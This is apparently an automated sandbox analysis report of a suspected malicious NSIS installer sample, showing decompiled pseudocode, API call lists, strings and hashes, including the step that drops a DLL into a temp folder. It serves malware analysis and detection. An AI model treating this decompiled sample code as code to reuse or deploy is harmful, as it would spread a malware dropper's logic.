				if(E00405B7D(_t84, "C:\\Users\\jones\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E00405B7D(_t92, _t80) == 0) {
						E0040618A(0, _t74, _t76, _t80,  *((intOrPtr*)(_t76 + 0x118)));
					}
					_t25 = LoadImageA( *0x42f420, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x42ec08 = _t25;
					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t27 = E00403BCF(_t71, __eflags);
							__eflags =  *0x42f4e0;
							if( *0x42f4e0 != 0) {
								_t28 = E004052F0(_t27, 0);
								__eflags = _t28;
								if(_t28 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42ebec; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x42a870, 5);
							_t34 = E00406492("RichEd20");
							__eflags = _t34;
							if(_t34 == 0) {
								E00406492("RichEd32");
							}
							_t81 = "RichEdit20A";
							_t35 = GetClassInfoA(0, _t81, 0x42ebc0);
							__eflags = _t35;
							if(_t35 == 0) {
								GetClassInfoA(0, "RichEdit", 0x42ebc0);
								 *0x42ebe4 = _t81;
								RegisterClassA(0x42ebc0);
							}
							_t36 =  *0x42ec00; // 0x0
							_t39 = DialogBoxParamA( *0x42f420, _t36 + 0x00000069 & 0x0000ffff, 0, E00403CA7, 0);
							E0040385A(E0040140B(5), 1);
							return _t39;
						}
						L22:
						_t31 = 2;
						return _t31;
					} else {
						_t71 =  *0x42f420;
						 *0x42ebc4 = E00401000;
						 *0x42ebd0 =  *0x42f420;
						 *0x42ebd4 = _t25;
						 *0x42ebe4 = 0x40a1f4;
						if(RegisterClassA(0x42ebc0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoA(0x30, 0,  &_v16, 0);
						 *0x42a870 = CreateWindowExA(0x80, 0x40a1f4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42f420, 0);
						goto L21;
					}
				} else {
					_t71 =  *(_t76 + 0x48);
					_t86 = _t71;
					if(_t71 == 0) {
						goto L16;
					}
					_t74 = 0x42e3c0;
					E00405FDE(_t71, _t86,  *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x42f478, 0x42e3c0, 0);
					_t57 =  *0x42e3c0; // 0x75
					if(_t57 == 0) {
						goto L16;
					}
					if(_t57 == 0x22) {
						_t74 = 0x42e3c1;
						 *((char*)(E00405ABA(0x42e3c1, 0x22))) = 0;
					}
					_t59 = lstrlenA(_t74) + _t74 - 4;
					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
						L15:
						E004060F7(_t80, E00405A8F(_t74));
						goto L16;
					} else {
						_t63 = GetFileAttributesA(_t74);
						if(_t63 == 0xffffffff) {
							L14:
							E00405AD6(_t74);
							goto L15;
						}
						_t92 = _t63 & 0x00000010;
						if((_t63 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}


























                                                                                    0x00403910
                                                                                    0x00403919
                                                                                    0x00403920
                                                                                    0x00403922
                                                                                    0x00403936
                                                                                    0x00403948
                                                                                    0x0040394f
                                                                                    0x00403956
                                                                                    0x0040395c
                                                                                    0x00403961
                                                                                    0x00403967
                                                                                    0x0040397a
                                                                                    0x0040397a
                                                                                    0x00403985
                                                                                    0x00403924
                                                                                    0x00403924
                                                                                    0x0040392f
                                                                                    0x0040392f
                                                                                    0x0040398a
                                                                                    0x00403994
                                                                                    0x0040399d
                                                                                    0x004039a2
                                                                                    0x004039b3
                                                                                    0x00403a3a
                                                                                    0x00403a42
                                                                                    0x00403a4b
                                                                                    0x00403a4b
                                                                                    0x00403a61
                                                                                    0x00403a67
                                                                                    0x00403a75
                                                                                    0x00403af6
                                                                                    0x00403afe
                                                                                    0x00403b08
                                                                                    0x00403b0d
                                                                                    0x00403b13
                                                                                    0x00403b9d
                                                                                    0x00403ba2
                                                                                    0x00403ba4
                                                                                    0x00403bc0
                                                                                    0x00000000
                                                                                    0x00403bc0
                                                                                    0x00403ba6
                                                                                    0x00403bac
                                                                                    0x00403bb4
                                                                                    0x00403bb4
                                                                                    0x00000000
                                                                                    0x00403bac
                                                                                    0x00403b21
                                                                                    0x00403b2c
                                                                                    0x00403b31
                                                                                    0x00403b33
                                                                                    0x00403b3a
                                                                                    0x00403b3a
                                                                                    0x00403b45
                                                                                    0x00403b4d
                                                                                    0x00403b4f
                                                                                    0x00403b51
                                                                                    0x00403b5a
                                                                                    0x00403b5d
                                                                                    0x00403b63
                                                                                    0x00403b63
                                                                                    0x00403b69
                                                                                    0x00403b82
                                                                                    0x00403b93
                                                                                    0x00000000
                                                                                    0x00403b98
                                                                                    0x00403b00
                                                                                    0x00403b02
                                                                                    0x00000000
                                                                                    0x00403a77
                                                                                    0x00403a77
                                                                                    0x00403a83
                                                                                    0x00403a8d
                                                                                    0x00403a93
                                                                                    0x00403a98
                                                                                    0x00403aa7
                                                                                    0x00403bc5
                                                                                    0x00403bc5
                                                                                    0x00000000
                                                                                    0x00403bc5
                                                                                    0x00403ab6
                                                                                    0x00403af1
                                                                                    0x00000000
                                                                                    0x00403af1
                                                                                    0x004039b9
                                                                                    0x004039b9
                                                                                    0x004039bc
                                                                                    0x004039be
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004039c8
                                                                                    0x004039d8
                                                                                    0x004039dd
                                                                                    0x004039e4
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004039e8
                                                                                    0x004039ea
                                                                                    0x004039f7
                                                                                    0x004039f7
                                                                                    0x004039ff
                                                                                    0x00403a05
                                                                                    0x00403a2d
                                                                                    0x00403a35
                                                                                    0x00000000
                                                                                    0x00403a17
                                                                                    0x00403a18
                                                                                    0x00403a21
                                                                                    0x00403a27
                                                                                    0x00403a28
                                                                                    0x00000000
                                                                                    0x00403a28
                                                                                    0x00403a23
                                                                                    0x00403a25
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403a25
                                                                                    0x00403a05

                                                                                    APIs
                                                                                      • Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                                                      • Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                                                    • GetUserDefaultUILanguage.KERNELBASE(00000002,73BCFA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe" ,00000000), ref: 00403924
                                                                                      • Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062
                                                                                    • lstrcatA.KERNEL32(1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,73BCFA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe" ,00000000), ref: 00403985
                                                                                    • lstrlenA.KERNEL32(uvlcopdlxoed,?,?,?,uvlcopdlxoed,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,73BCFA90), ref: 004039FA
                                                                                    • lstrcmpiA.KERNEL32(?,.exe,uvlcopdlxoed,?,?,?,uvlcopdlxoed,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000), ref: 00403A0D
                                                                                    • GetFileAttributesA.KERNEL32(uvlcopdlxoed), ref: 00403A18
                                                                                    • LoadImageA.USER32 ref: 00403A61
                                                                                    • RegisterClassA.USER32 ref: 00403A9E
                                                                                    • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403AB6
                                                                                    • CreateWindowExA.USER32 ref: 00403AEB
                                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00403B21
                                                                                    • GetClassInfoA.USER32 ref: 00403B4D
                                                                                    • GetClassInfoA.USER32 ref: 00403B5A
                                                                                    • RegisterClassA.USER32 ref: 00403B63
                                                                                    • DialogBoxParamA.USER32 ref: 00403B82
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                                                    • String ID: "C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$uvlcopdlxoed
                                                                                    • API String ID: 606308-2680337277
                                                                                    • Opcode ID: bf4b58a18f8def52aed812ad83ca3b0c7ceda486cf0da5eaf41a6ea4bc3d6bf1
                                                                                    • Instruction ID: 74cd8b4f7d81cde8c77274d740e3983652abf123a0ec58253698c850822a2f16
                                                                                    • Opcode Fuzzy Hash: bf4b58a18f8def52aed812ad83ca3b0c7ceda486cf0da5eaf41a6ea4bc3d6bf1
                                                                                    • Instruction Fuzzy Hash: EC61A5702402016ED220FB669D46F373ABCEB4474DF50403FF995B62E3DA7DA9068A2D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00402EA1, Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 181memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 78%
                                                                                    			E00402EA1(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				long _t50;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				long _t70;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				void* _t85;
				signed int _t87;
				void* _t89;
				long _t90;
				long _t93;
				intOrPtr* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = "C:\\Users\\jones\\Desktop\\1cec9342_by_Libranalysis.exe";
				 *0x42f430 = _t43 + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\jones\\Desktop\\1cec9342_by_Libranalysis.exe", 0x400);
				_t89 = E00405C90(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x40a018 = _t89;
				if(_t89 == 0xffffffff) {
					return "Error launching installer";
				}
				_t92 = "C:\\Users\\jones\\Desktop";
				E004060F7("C:\\Users\\jones\\Desktop", _t91);
				E004060F7(0x437000, E00405AD6(_t92));
				_t50 = GetFileSize(_t89, 0);
				 *0x42944c = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402E3D(1);
					if( *0x42f438 == _t82) {
						goto L29;
					}
					if(_v8 == _t82) {
						L28:
						_t94 = GlobalAlloc(0x40, _v24);
						E00403300( *0x42f438 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E004030D8(); // executed
						if(_t57 == _v24) {
							 *0x42f434 = _t94;
							 *0x42f43c =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x42f440 =  *0x42f440 + 1;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405C4B(0x42f460, _t94 + 4, 0x40);
							return 0;
						}
						goto L29;
					}
					E00403300( *0x41d440);
					if(E004032EA( &_a4, 4) == 0 || _v12 != _a4) {
						goto L29;
					} else {
						goto L28;
					}
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x42f438) & 0x00007e00) + 0x200;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						if(E004032EA(0x415440, _t90) == 0) {
							E00402E3D(1);
							L29:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x42f438 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E00402E3D(0);
							}
							goto L20;
						}
						E00405C4B( &_v44, 0x415440, 0x1c);
						_t77 = _v44;
						if((_t77 & 0xfffffff0) == 0 && _v40 == 0xdeadbeef && _v28 == 0x74736e49 && _v32 == 0x74666f73 && _v36 == 0x6c6c754e) {
							_a4 = _a4 | _t77;
							_t87 =  *0x41d440; // 0x66495
							 *0x42f4e0 =  *0x42f4e0 | _a4 & 0x00000002;
							_t80 = _v20;
							 *0x42f438 = _t87;
							if(_t80 > _t93) {
								goto L29;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v8 = _v8 + 1;
								_t24 = _t80 - 4; // 0x40a194
								_t93 = _t24;
								if(_t90 > _t93) {
									_t90 = _t93;
								}
								goto L20;
							} else {
								break;
							}
						}
						L20:
						if(_t93 <  *0x42944c) {
							_v12 = E004065B7(_v12, 0x415440, _t90);
						}
						 *0x41d440 =  *0x41d440 + _t90;
						_t93 = _t93 - _t90;
					} while (_t93 != 0);
					_t82 = 0;
					goto L24;
				}
			}




























                                                                                    0x00402ea9
                                                                                    0x00402eac
                                                                                    0x00402eaf
                                                                                    0x00402eb2
                                                                                    0x00402eb8
                                                                                    0x00402ec9
                                                                                    0x00402ece
                                                                                    0x00402ee1
                                                                                    0x00402ee6
                                                                                    0x00402ee9
                                                                                    0x00402eef
                                                                                    0x00000000
                                                                                    0x00402ef1
                                                                                    0x00402efc
                                                                                    0x00402f02
                                                                                    0x00402f13
                                                                                    0x00402f1a
                                                                                    0x00402f22
                                                                                    0x00402f27
                                                                                    0x00402f29
                                                                                    0x00403014
                                                                                    0x00403016
                                                                                    0x00403022
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403027
                                                                                    0x0040304b
                                                                                    0x00403056
                                                                                    0x00403061
                                                                                    0x00403066
                                                                                    0x00403069
                                                                                    0x0040306a
                                                                                    0x0040306b
                                                                                    0x0040306d
                                                                                    0x00403075
                                                                                    0x0040308c
                                                                                    0x00403094
                                                                                    0x00403099
                                                                                    0x0040309b
                                                                                    0x0040309b
                                                                                    0x004030a3
                                                                                    0x004030a3
                                                                                    0x004030a6
                                                                                    0x004030a7
                                                                                    0x004030a7
                                                                                    0x004030aa
                                                                                    0x004030ac
                                                                                    0x004030ac
                                                                                    0x004030b6
                                                                                    0x004030bc
                                                                                    0x004030ca
                                                                                    0x00000000
                                                                                    0x004030cf
                                                                                    0x00000000
                                                                                    0x00403075
                                                                                    0x0040302f
                                                                                    0x00403041
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00402f2f
                                                                                    0x00402f34
                                                                                    0x00402f39
                                                                                    0x00402f3d
                                                                                    0x00402f44
                                                                                    0x00402f4b
                                                                                    0x00402f4d
                                                                                    0x00402f4d
                                                                                    0x00402f58
                                                                                    0x00403080
                                                                                    0x00403077
                                                                                    0x00000000
                                                                                    0x00403077
                                                                                    0x00402f65
                                                                                    0x00402fe5
                                                                                    0x00402fe9
                                                                                    0x00402fee
                                                                                    0x00000000
                                                                                    0x00402fe5
                                                                                    0x00402f6e
                                                                                    0x00402f73
                                                                                    0x00402f7b
                                                                                    0x00402fa1
                                                                                    0x00402fa7
                                                                                    0x00402fb0
                                                                                    0x00402fb6
                                                                                    0x00402fbb
                                                                                    0x00402fc1
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00402fcb
                                                                                    0x00402fd3
                                                                                    0x00402fd6
                                                                                    0x00402fd6
                                                                                    0x00402fdb
                                                                                    0x00402fdd
                                                                                    0x00402fdd
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00402fcb
                                                                                    0x00402fef
                                                                                    0x00402ff5
                                                                                    0x00403001
                                                                                    0x00403001
                                                                                    0x00403004
                                                                                    0x0040300a
                                                                                    0x0040300a
                                                                                    0x00403012
                                                                                    0x00000000
                                                                                    0x00403012

                                                                                    APIs
                                                                                    • GetTickCount.KERNEL32 ref: 00402EB2
                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe,00000400), ref: 00402ECE
                                                                                      • Part of subcall function 00405C90: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe,80000000,00000003), ref: 00405C94
                                                                                      • Part of subcall function 00405C90: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe,C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe,80000000,00000003), ref: 00402F1A
                                                                                    • GlobalAlloc.KERNEL32(00000040,00000020), ref: 00403050
                                                                                    Strings
                                                                                    • Null, xrefs: 00402F98
                                                                                    • soft, xrefs: 00402F8F
                                                                                    • Inst, xrefs: 00402F86
                                                                                    • C:\Users\user\Desktop, xrefs: 00402EFC, 00402F01, 00402F07
                                                                                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00403077
                                                                                    • Error launching installer, xrefs: 00402EF1
                                                                                    • "C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe" , xrefs: 00402EA1
                                                                                    • C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe, xrefs: 00402EB8, 00402EC7, 00402EDB, 00402EFB
                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00402EA8
                                                                                    • @TA, xrefs: 00402F2F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                    • String ID: "C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe" $@TA$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                    • API String ID: 2803837635-1811751594
                                                                                    • Opcode ID: d2642f5c1e57ff917447350ecc80b65a471f1c26fbd3ec2d1bf2d56bf534e989
                                                                                    • Instruction ID: b77d5a27d8a3a8735664692b17331c00252a13d20c8f5ee7c59d5cd6c332e3a5
                                                                                    • Opcode Fuzzy Hash: d2642f5c1e57ff917447350ecc80b65a471f1c26fbd3ec2d1bf2d56bf534e989
                                                                                    • Instruction Fuzzy Hash: B851E471A00204ABDF20AF64DD85FAF7AB8AB14359F60413BF500B22D1C7B89E858B5D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00401759, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147stringtimeCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 61%
                                                                                    			E00401759(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				CHAR* _t83;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402BCE(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E00405AFC(_t82);
				_push(_t82);
				_t83 = "uvlcopdlxoed";
				if(_t33 == 0) {
					lstrcatA(E00405A8F(E004060F7(_t83, "C:\\Users\\jones\\AppData\\Local\\Temp")), ??);
				} else {
					E004060F7();
				}
				E004063D2(_t83);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E0040646B(_t83);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E00405C6B(_t83);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E00405C90(_t83, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0xc) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E0040521E(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x42f4c8;
						goto L32;
					} else {
						E004060F7(0x40ac38, 0x430000);
						E004060F7(0x430000, _t83);
						E0040618A(_t75, 0x40ac38, _t83, "C:\Users\jones\AppData\Local\Temp\nsu26D1.tmp\8t7v9o92aq2mtu.dll",  *((intOrPtr*)(_t85 - 0x14)));
						E004060F7(0x430000, 0x40ac38);
						_t62 = E00405813("C:\Users\jones\AppData\Local\Temp\nsu26D1.tmp\8t7v9o92aq2mtu.dll",  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x42f4c8 =  &( *0x42f4c8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(_t83);
								_push(0xfffffffa);
								E0040521E();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E0040521E(0xffffffea,  *(_t85 - 8));
				 *0x42f4f4 =  *0x42f4f4 + 1;
				_push(_t75);
				_push(_t75);
				_push( *(_t85 - 0xc));
				_push( *((intOrPtr*)(_t85 - 0x20)));
				_t43 = E004030D8(); // executed
				 *0x42f4f4 =  *0x42f4f4 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0xc), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 0xc)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E0040618A(_t75, _t80, _t83, _t83, 0xffffffee);
					} else {
						E0040618A(_t75, _t80, _t83, _t83, 0xffffffe9);
						lstrcatA(_t83,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(_t83);
					E00405813();
					goto L29;
				}
				goto L33;
			}

















                                                                                    0x00401759
                                                                                    0x00401760
                                                                                    0x00401769
                                                                                    0x0040176c
                                                                                    0x0040176f
                                                                                    0x00401774
                                                                                    0x00401775
                                                                                    0x0040177c
                                                                                    0x00401798
                                                                                    0x0040177e
                                                                                    0x0040177f
                                                                                    0x0040177f
                                                                                    0x0040179e
                                                                                    0x004017a8
                                                                                    0x004017a8
                                                                                    0x004017ac
                                                                                    0x004017af
                                                                                    0x004017b4
                                                                                    0x004017b6
                                                                                    0x004017b8
                                                                                    0x004017bd
                                                                                    0x004017bd
                                                                                    0x004017c8
                                                                                    0x004017c8
                                                                                    0x004017d9
                                                                                    0x004017db
                                                                                    0x004017db
                                                                                    0x004017dc
                                                                                    0x004017dc
                                                                                    0x004017df
                                                                                    0x004017e2
                                                                                    0x004017e5
                                                                                    0x004017e5
                                                                                    0x004017ec
                                                                                    0x004017fb
                                                                                    0x00401800
                                                                                    0x00401803
                                                                                    0x00401806
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00401808
                                                                                    0x0040180b
                                                                                    0x00401865
                                                                                    0x0040186a
                                                                                    0x004015b0
                                                                                    0x004027bf
                                                                                    0x004027bf
                                                                                    0x00402a5a
                                                                                    0x00402a5d
                                                                                    0x00402a5d
                                                                                    0x00000000
                                                                                    0x0040180d
                                                                                    0x00401813
                                                                                    0x0040181e
                                                                                    0x0040182b
                                                                                    0x00401836
                                                                                    0x0040184c
                                                                                    0x0040184c
                                                                                    0x0040184f
                                                                                    0x00000000
                                                                                    0x00401855
                                                                                    0x00401855
                                                                                    0x00401856
                                                                                    0x00401873
                                                                                    0x00402a63
                                                                                    0x00402a63
                                                                                    0x00402a63
                                                                                    0x00401858
                                                                                    0x00401858
                                                                                    0x00401859
                                                                                    0x00401492
                                                                                    0x00402387
                                                                                    0x00402387
                                                                                    0x00402387
                                                                                    0x00401856
                                                                                    0x0040184f
                                                                                    0x00402a65
                                                                                    0x00402a69
                                                                                    0x00402a69
                                                                                    0x00401883
                                                                                    0x00401888
                                                                                    0x0040188e
                                                                                    0x0040188f
                                                                                    0x00401890
                                                                                    0x00401893
                                                                                    0x00401896
                                                                                    0x0040189b
                                                                                    0x004018a1
                                                                                    0x004018a5
                                                                                    0x004018a7
                                                                                    0x004018af
                                                                                    0x004018bb
                                                                                    0x004018a9
                                                                                    0x004018a9
                                                                                    0x004018ad
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004018ad
                                                                                    0x004018c4
                                                                                    0x004018ca
                                                                                    0x004018cc
                                                                                    0x00000000
                                                                                    0x004018d2
                                                                                    0x004018d2
                                                                                    0x004018d5
                                                                                    0x004018ed
                                                                                    0x004018d7
                                                                                    0x004018da
                                                                                    0x004018e3
                                                                                    0x004018e3
                                                                                    0x004018f2
                                                                                    0x004018f7
                                                                                    0x00402382
                                                                                    0x00000000
                                                                                    0x00402382
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • lstrcatA.KERNEL32(00000000,00000000,uvlcopdlxoed,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401798
                                                                                    • CompareFileTime.KERNEL32(-00000014,?,uvlcopdlxoed,uvlcopdlxoed,00000000,00000000,uvlcopdlxoed,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017C2
                                                                                      • Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,arability Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406104
                                                                                      • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00422448,73BCEA30,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                                                      • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00422448,73BCEA30,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                                                      • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00422448,73BCEA30), ref: 0040527A
                                                                                      • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                                                      • Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                                                      • Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                                                      • Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                                                    Strings
                                                                                    Memory Dump Source
